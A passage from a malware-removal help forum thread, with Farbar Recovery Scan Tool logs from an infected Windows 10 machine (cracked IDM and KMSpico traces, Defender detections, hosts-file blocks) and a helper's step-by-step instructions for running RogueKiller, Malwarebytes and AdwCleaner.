2019-02-08 21:45 - 2019-02-08 21:46 - 000672090 _____ (FAZ ) C:\Users\Thomazing!\AppData\Local\Temp\global_installer.exe
2019-02-08 21:44 - 2019-02-08 21:55 - 002892544 _____ (BitTorrent Inc.) C:\Users\Thomazing!\AppData\Local\Temp\IDM_Serial_Number_Crack_Patch_Free_2019_Serial_Keys.exe
2019-02-08 22:22 - 2019-02-09 08:52 - 000000000 ____D () C:\Users\Thomazing!\AppData\Local\Temp\ImagingEngine.dll
2019-02-08 21:46 - 2019-02-08 21:46 - 000167616 _____ (Microsoft Corporation) C:\Users\Thomazing!\AppData\Local\Temp\symsrv.dll
2019-02-08 21:51 - 2019-02-08 21:47 - 000099906 _____ () C:\Users\Thomazing!\AppData\Local\Temp\Uninstall.exe
==================== Bamital & volsnap ======================
(There is no automatic fix for files that do not pass verification.)
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\dllhost.exe => File is digitally signed
C:\Windows\SysWOW64\dllhost.exe => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
LastRegBack: 2019-02-09 13:15
==================== End of FRST.txt ============================
-
February 10th, 2019, 03:30 AM
#11
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 8.02.2019
Ran by Thomazing! (10-02-2019 15:26:00)
Running from C:\Users\Thomazing!\Downloads
Windows 10 Pro 10240.16487 (X64) (2019-02-09 05:18:42)
Boot Mode: Normal
==========================================================
==================== Accounts: =============================
Administrator (S-1-5-21-3408261874-2140888000-2142219774-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-3408261874-2140888000-2142219774-503 - Limited - Disabled)
Guest (S-1-5-21-3408261874-2140888000-2142219774-501 - Limited - Disabled)
Thomazing! (S-1-5-21-3408261874-2140888000-2142219774-1001 - Administrator - Enabled) => C:\Users\Thomazing!
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Malwarebytes (Enabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AS: Malwarebytes (Enabled - Up to date) {98619B37-4FC4-67F2-1C99-EEF6D47DBD96}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Installed Programs ======================
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
µTorrent (HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\uTorrent) (Version: 3.5.5.44994 - BitTorrent Inc.)
µTorrent (HKU\S-1-5-21-3408261874-2140888000-2142219774-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-02102019152109985\...\uTorrent) (Version: 3.5.5.44994 - BitTorrent Inc.)
µTorrent (HKU\S-1-5-21-3408261874-2140888000-2142219774-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-02102019152308407\...\uTorrent) (Version: 3.5.5.44994 - BitTorrent Inc.)
Alien Team (HKLM-x32\...\{52811919-39BB-4C90-95A6-323FA6636B29}_is1) (Version: 1 - Alien Team)
CCleaner (HKLM\...\CCleaner) (Version: 5.52 - Piriform)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 72.0.3626.96 - Google Inc.)
Google Toolbar for Internet Explorer (HKLM-x32\...\{18455581-E099-4BA8-BC6B-F34B2F06600C}) (Version: 1.0.0 - Google Inc.) Hidden
Google Toolbar for Internet Explorer (HKLM-x32\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.8231.2252 - Google Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.23 - Google Inc.) Hidden
IDM Crack 6.25 build 20 (HKLM-x32\...\IDM Crack 6.25 build 20) (Version: build 21 - Crackingpatching.com Team)
Internet Download Manager (HKLM-x32\...\Internet Download Manager) (Version: - Tonec Inc.)
Malwarebytes version 3.7.1.2839 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.7.1.2839 - Malwarebytes)
Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUSR) (Version: 14.0.4763.1000 - Microsoft Corporation)
RogueKiller version 13.1.4.0 (HKLM\...\8B3D7924-ED89-486B-8322-E8594065D5CB_is1) (Version: 13.1.4.0 - Adlice Software)
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 17.0.10.51 - Synaptics Incorporated)
VLC media player (HKLM\...\VLC media player) (Version: 3.0.6 - VideoLAN)
WinRAR 5.70 beta 1 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.70.1 - win.rar GmbH)
==================== Custom CLSID (Whitelisted): ==========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
ShellIconOverlayIdentifiers: [ IDM Shell Extension] -> {CDC95B92-E27C-4745-A8C5-64A52A78855D} => C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll [2015-08-14] (Tonec Inc. -> Tonec Inc.)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2019-01-28] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2019-01-28] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2019-02-01] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2019-02-01] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2019-01-28] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2019-01-28] (win.rar GmbH -> Alexander Roshal)
==================== Scheduled Tasks (Whitelisted) =============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
Task: {25681BAB-9719-40FC-87F6-A290829EB501} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2019-01-10] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {71E02E5A-83AD-4151-B826-04CEFE0C7B32} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2019-02-08] (Google Inc -> Google Inc.)
Task: {9EF0F8A1-4CFA-45BB-8959-8C5455003D37} - System32\Tasks\Synaptics TouchPad Enhancements => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2019-02-08] (Synaptics Incorporated -> Synaptics Incorporated)
Task: {E311046B-4383-410D-B613-3788683CA329} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2019-02-08] (Google Inc -> Google Inc.)
Task: {EB684CE2-5E4F-4692-B7BC-796F32D5014C} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe [2019-02-08] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {FC33DBE7-C910-4F1C-B383-007FD7E6ABC7} - System32\Tasks\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser => %windir%\system32\rundll32.exe generaltel.dll,RunTelemetryW
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
==================== Shortcuts & WMI ========================
(The entries could be listed to be restored or removed.)
==================== Loaded Modules (Whitelisted) ==============
2015-09-10 13:08 - 2015-09-10 13:08 - 000032768 _____ () C:\Windows\SYSTEM32\licensemanagerapi.dll
2015-09-10 13:08 - 2015-09-10 13:08 - 000404480 _____ () C:\Windows\System32\diagtrack_wininternal.dll
2015-09-10 13:08 - 2015-09-10 13:08 - 002498808 _____ () C:\Windows\system32\CoreUIComponents.dll
2015-07-10 11:19 - 2015-07-10 11:19 - 000429056 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2015-09-10 13:08 - 2015-09-10 13:08 - 006569472 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2015-07-10 11:13 - 2015-09-10 13:08 - 000471040 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2015-09-10 13:08 - 2015-09-10 13:08 - 001808384 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2015-09-10 13:08 - 2015-09-10 13:08 - 002274816 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2019-02-08 23:02 - 2019-02-06 10:00 - 005186032 _____ () C:\Program Files (x86)\Google\Chrome\Application\72.0.3626.96\libglesv2.dll
2019-02-08 23:02 - 2019-02-06 10:00 - 000117232 _____ () C:\Program Files (x86)\Google\Chrome\Application\72.0.3626.96\libegl.dll
==================== Alternate Data Streams (Whitelisted) =========
(If an entry is included in the fixlist, only the ADS will be removed.)
==================== Safe Mode (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
==================== Association (Whitelisted) ===============
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
==================== Internet Explorer trusted/restricted ===============
(If an entry is included in the fixlist, it will be removed from the registry.)
==================== Hosts content: ==========================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2015-07-31 06:42 - 2019-02-08 21:46 - 002097392 _____ C:\Windows\system32\drivers\etc\hosts
127.0.0.1 space1.adminpressure.space
127.0.0.1 trackpressure.website
127.0.0.1 htagzdownload.pw
127.0.0.1 texttotalk.org
127.0.0.1 360devtraking.website
127.0.0.1 room1.360dev.info
127.0.0.1 djapp.info
127.0.0.1 technologievimy.com
==================== Other Areas ============================
(Currently there is no automatic fix for this section.)
HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\Control Panel\Desktop\\Wallpaper ->
HKU\S-1-5-21-3408261874-2140888000-2142219774-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-02102019152109985\Control Panel\Desktop\\Wallpaper ->
HKU\S-1-5-21-3408261874-2140888000-2142219774-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-02102019152308407\Control Panel\Desktop\\Wallpaper ->
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: Off)
Windows Firewall is enabled.
==================== MSCONFIG/TASK MANAGER disabled items ==
If an entry is included in the fixlist, it will be removed.
HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\StartupApproved\Run: => "IDMan"
HKU\S-1-5-21-3408261874-2140888000-2142219774-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-02102019152109985\...\StartupApproved\Run: => "IDMan"
HKU\S-1-5-21-3408261874-2140888000-2142219774-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-02102019152308407\...\StartupApproved\Run: => "IDMan"
==================== FirewallRules (Whitelisted) ===============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
FirewallRules: [{34014409-F047-4511-8A51-E0086652B848}] => (Allow) C:\Users\Thomazing!\AppData\Roaming\uTorrent\uTorrent.exe (BitTorrent Inc -> BitTorrent Inc.)
FirewallRules: [{EE26B7B5-4F57-4DB5-8AAD-A1A7AEEA5CF8}] => (Allow) C:\Users\Thomazing!\AppData\Roaming\uTorrent\uTorrent.exe (BitTorrent Inc -> BitTorrent Inc.)
FirewallRules: [{76CDF517-F312-44A8-B7D6-E74702BA4382}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{3F615D37-89C0-45E6-842F-5EB82ECD2C76}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{D3020994-C154-42F4-93AA-C0B3C54504AB}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{1DE617D9-CAAF-4865-88CC-8B52F2C6CE8C}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{47792053-3338-4A6F-AE9E-447B51B4287A}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{0A843646-B083-4688-8D3B-A42EB241BEAF}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{9A85637C-ABF5-4BC7-8DBF-AEAC9B50890A}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{4F5E25DC-8146-46D7-B3C7-DAEBA3A90326}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{2B39C486-2C5E-45FF-B698-F6C65CB96345}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{456C25A6-8A05-4EC5-B99F-03BA6956BF72}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google Inc.)
FirewallRules: [{92C0DFAF-0F89-4F63-A042-BBB6C7AEAE3C}] => (Allow) C:\Program Files\CCleaner\CCUpdate.exe (Piriform Software Ltd -> Piriform Software Ltd)
FirewallRules: [{D453C330-AB73-4D2F-AEDC-5ACC2FECD2EF}] => (Allow) C:\Program Files\CCleaner\CCUpdate.exe (Piriform Software Ltd -> Piriform Software Ltd)
FirewallRules: [{76C2B05D-59C7-4F00-A6FA-E3B3EC26DF57}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{A5393F9A-F08B-4AF7-8E8A-5552C87EB8A1}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{6A332DC7-031B-46F5-8EE9-4BC596EEC559}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{1EA56DA0-0D98-40D4-9415-02849C00A304}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{12C02EC4-E8CB-4E17-9AE1-270A47450D88}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{38643855-9433-404F-AB1A-5BA1486C3091}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{06C0CE62-896B-4B0A-8B9C-E0E60278B93A}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{1FDF2492-B639-4E70-BF09-CD0BA8C38671}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{58AFFE55-6861-4937-A48E-10153B97E5A0}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{ED6ABB3C-84FE-452A-AAB0-92ADAB765B5A}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{7DA9684C-3EDF-473F-BE47-0ADBD2E127DC}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{E43D8A77-66E2-47FF-AB3B-01927D6F878D}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
==================== Restore Points =========================
ATTENTION: System Restore is disabled
==================== Faulty Device Manager Devices =============
==================== Event log errors: =========================
Application errors:
==================
Error: (02/09/2019 10:34:47 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-OHFLJFD)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.
Error: (02/09/2019 08:39:51 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-OHFLJFD)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.
Error: (02/09/2019 08:37:22 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-OHFLJFD)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.
Error: (02/09/2019 07:29:04 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-OHFLJFD)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.
Error: (02/09/2019 07:03:34 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: cloudnet.exe, version: 7.2.1.1, time stamp: 0x5c5df16a
Faulting module name: KERNELBASE.dll, version: 10.0.10240.16384, time stamp: 0x559f3b2a
Exception code: 0xc0000005
Fault offset: 0x000ffc62
Faulting process id: 0x2648
Faulting application start time: 0x01d4c002846509ab
Faulting application path: C:\Users\Thomazing!\AppData\Local\Temp\csrss\cloudnet.exe
Faulting module path: C:\Windows\SYSTEM32\KERNELBASE.dll
Report Id: 005d774b-7636-4cd7-a6d7-93e91613f789
Faulting package full name:
Faulting package-relative application ID:
Error: (02/09/2019 01:24:26 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-OHFLJFD)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.
Error: (02/09/2019 01:22:58 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-OHFLJFD)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.
Error: (02/09/2019 12:44:21 AM) (Source: MsiInstaller) (EventID: 11327) (User: DESKTOP-OHFLJFD)
Description: Продукт: Microsoft.NET -- Ошибка 1327. Недопустимое устройство: G:\
System errors:
=============
Error: (02/09/2019 03:59:54 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Sync Host_Session2 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
Error: (02/09/2019 01:05:01 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-OHFLJFD)
Description: The server {9BA05972-F6A8-11CF-A442-00A0C90A8F39} did not register with DCOM within the required timeout.
Error: (02/09/2019 01:04:59 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Sync Host_Session1 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
Error: (02/09/2019 12:46:24 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-OHFLJFD)
Description: The server {9BA05972-F6A8-11CF-A442-00A0C90A8F39} did not register with DCOM within the required timeout.
Error: (02/09/2019 12:46:23 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Sync Host_Session1 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
Error: (02/09/2019 12:46:18 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The Office Software Protection Platform service terminated unexpectedly. It has done this 1 time(s).
Error: (02/09/2019 12:22:47 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Sync Host_Session2 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
Error: (02/09/2019 12:20:40 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: A fatal alert was generated and sent to the remote endpoint. This may result in termination of the connection. The TLS protocol defined fatal error code is 10. The Windows SChannel error state is 10.
Windows Defender:
===================================
Date: 2019-02-08 22:58:52.037
Description:
Windows Defender has detected malware or other potentially unwanted software.
For more information please see the following:
http://go.microsoft.com/fwlink/?link...0&enterprise=0
Name: HackTool:Win32/AutoKMS
ID: 2147685180
Severity: Medium
Category: Tool
Path: file:_C:\Users\Thomazing!\AppData\Local\Temp\Rar$EXa15208.40575\Gold_Snake_Portable_v10.1.8\KMSpico Portable\cert\installAll.cmd
Detection Origin: Local machine
Detection Type: Concrete
Detection Source: System
Process Name: Unknown
Signature Version: AV: 1.199.1615.0, AS: 1.199.1615.0, NIS: 114.1.0.0
Engine Version: AM: 1.1.11701.0, NIS: 2.1.11502.0
Date: 2019-02-08 22:28:36.285
Description:
Windows Defender has detected malware or other potentially unwanted software.
For more information please see the following:
http://go.microsoft.com/fwlink/?link...0&enterprise=0
Name: HackTool:Win32/AutoKMS
ID: 2147685180
Severity: Medium
Category: Tool
Path: file:_C:\Users\Thomazing!\AppData\Local\Temp\Rar$EXa15208.40575\Gold_Snake_Portable_v10.1.8\KMSpico Portable\cert\installAll.cmd
Detection Origin: Local machine
Detection Type: Concrete
Detection Source: System
Process Name: Unknown
Signature Version: AV: 1.199.1615.0, AS: 1.199.1615.0, NIS: 114.1.0.0
Engine Version: AM: 1.1.11701.0, NIS: 2.1.11502.0
Date: 2019-02-08 22:22:31.668
Description:
Windows Defender has detected malware or other potentially unwanted software.
For more information please see the following:
http://go.microsoft.com/fwlink/?link...0&enterprise=0
Name: HackTool:Win32/AutoKMS
ID: 2147685180
Severity: Medium
Category: Tool
Path: file:_C:\Users\Thomazing!\AppData\Local\Temp\Rar$EXa15208.40575\Gold_Snake_Portable_v10.1.8\KMSpico Portable\cert\installAll.cmd
Detection Origin: Local machine
Detection Type: Concrete
Detection Source: System
Process Name: Unknown
Signature Version: AV: 1.199.1615.0, AS: 1.199.1615.0, NIS: 114.1.0.0
Engine Version: AM: 1.1.11701.0, NIS: 2.1.11502.0
Date: 2019-02-08 22:08:55.987
Description:
Windows Defender has detected malware or other potentially unwanted software.
For more information please see the following:
http://go.microsoft.com/fwlink/?link...0&enterprise=0
Name: HackTool:Win32/AutoKMS
ID: 2147685180
Severity: Medium
Category: Tool
Path: file:_C:\Users\Thomazing!\AppData\Local\Temp\Rar$EXa15208.40575\Gold_Snake_Portable_v10.1.8\KMSpico Portable\cert\installAll.cmd
Detection Origin: Local machine
Detection Type: Concrete
Detection Source: System
Process Name: Unknown
Signature Version: AV: 1.199.1615.0, AS: 1.199.1615.0, NIS: 114.1.0.0
Engine Version: AM: 1.1.11701.0, NIS: 2.1.11502.0
Date: 2019-02-08 22:00:18.323
Description:
Windows Defender has detected malware or other potentially unwanted software.
For more information please see the following:
http://go.microsoft.com/fwlink/?link...0&enterprise=0
Name: HackTool:Win32/AutoKMS
ID: 2147685180
Severity: Medium
Category: Tool
Path: file:_C:\Users\Thomazing!\AppData\Local\Temp\Rar$EXa15208.40575\Gold_Snake_Portable_v10.1.8\KMSpico Portable\cert\installAll.cmd;file:_D:\Thomas' Backup (1-22-16)\Thomas Entena\Documents\Set-Up\windows 10\Gold_Snake_Portable_v10.1.8\KMSpico Portable\cert\installAll.cmd
Detection Origin: Local machine
Detection Type: Concrete
Detection Source: Real-Time Protection
Process Name: C:\Program Files\WinRAR\WinRAR.exe
Signature Version: AV: 1.199.1615.0, AS: 1.199.1615.0, NIS: 114.1.0.0
Engine Version: AM: 1.1.11701.0, NIS: 2.1.11502.0
==================== Memory info ===========================
Processor: Pentium(R) Dual-Core CPU T4400 @ 2.20GHz
Percentage of memory in use: 23%
Total physical RAM: 8059.98 MB
Available physical RAM: 6126.46 MB
Total Virtual: 9979.98 MB
Available Virtual: 7991.81 MB
==================== Drives ================================
Drive c: () (Fixed) (Total:97.66 GB) (Free:79.17 GB) NTFS
Drive e: (Abebi) (Fixed) (Total:125.81 GB) (Free:21.43 GB) NTFS
\\?\Volume{134fa4c9-0000-0000-0000-100000000000}\ (System Reserved) (Fixed) (Total:0.1 GB) (Free:0.06 GB) NTFS
==================== MBR & Partition Table ==================
========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 223.6 GB) (Disk ID: 134FA4C9)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=97.7 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=125.8 GB) - (Type=0F Extended)
==================== End of Addition.txt ============================
-
February 10th, 2019, 03:58 AM
#12
MWB still busy blocking the malwares even after the scan.. ampf!
-
February 10th, 2019, 06:45 PM
#13
Avast is fine and it's free.
Download RogueKiller from one of the following links and save it to your Desktop:
Link 1
Link 2
- Close all the running programs
- Double click on downloaded setup.exe file to install the program.
- Click on Start Scan button.
- Click on another Start Scan button.
- Wait until the Status box shows Scan Finished
- Click on Remove Selected.
- Wait until the Status box shows Deleting Finished.
- Click on Report and copy/paste the content of the Notepad into your next reply.
- RKreport.txt could also be found on your desktop.
- If more than one log is produced post all logs.
Please download Malwarebytes to your desktop.
- Double-click mb3-setup-consumer-{version}.exe and follow the prompts to install the program.
- Then click Finish.
- Once the program has fully updated, select Scan Now on the Dashboard. Or select the Threat Scan from the Scan menu.
- If another update of the definitions is available, it will be implemented before the rest of the scanning procedure.
- When the scan is complete, make sure that all Threats are selected, and click Remove Selected.
- Restart your computer when prompted to do so.
- The Scan log is available throughout History ->Application logs. Please post it contents in your next reply.
Please download AdwCleaner by Xplode and save to your Desktop.
- Double click on AdwCleaner.exe to run the tool.
Vista/Windows 7/8/10 users right-click and select Run As Administrator - The tool will start to update the database if one is required.
- Click on the Scan button.
- AdwCleaner will begin...be patient as the scan may take some time to complete.
- After the scan has finished, click on the Logfile button.
- A window will open which lists the logs of your scans.
- Click on the Scan tab.
- Double-click the most recent scan which will be at the top of the list....the log will appear.
- Review the results...see note below
- After reviewing the log, click on the Clean button.
- Press OK when asked to close all programs and follow the onscreen prompts.
- Press OK again to allow AdwCleaner to restart the computer and complete the removal process.
- After rebooting, a logfile report (AdwCleaner[CX].txt) will open automatically (where the largest value of X represents the most recent report).
- To open a Cleaning log, launch AdwareClearer, click on the Logfile button, click on the Cleaning tab and double-click the log at the top of the list.
- Copy and paste the contents of AdwCleaner[CX].txt in your next reply.
- A copy of all logfiles are saved to C:\AdwCleaner.
-- Note: The contents of the AdwCleaner log file may be confusing. Unless you see a program name or entry that you recognize and know should not be removed, don't worry about it. If you see an entry you want to keep, return to AdwCleaner before cleaning...all detected items will be listed (and checked) in each tab. Click on and uncheck any items you want to keep.
-
February 10th, 2019, 07:58 PM
#14
RogueKiller Anti-Malware V13.1.4.0 (x64) [Feb 4 2019] (Free) by Adlice Software
mail : https://adlice.com/contact/
Website : https://adlice.com/download/roguekiller/
Operating System : Windows 10 (10.0.10240) 64 bits
Started in : Normal mode
User : Thomazing! [Administrator]
Started from : C:\Program Files\RogueKiller\RogueKiller64.exe
Signatures : 20190204_072850, Driver : Loaded
Mode : Standard Scan, Scan -- Date : 2019/02/11 07:11:47 (Duration : 00:17:22)
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Processes ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Process Modules ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Services ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Tasks ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
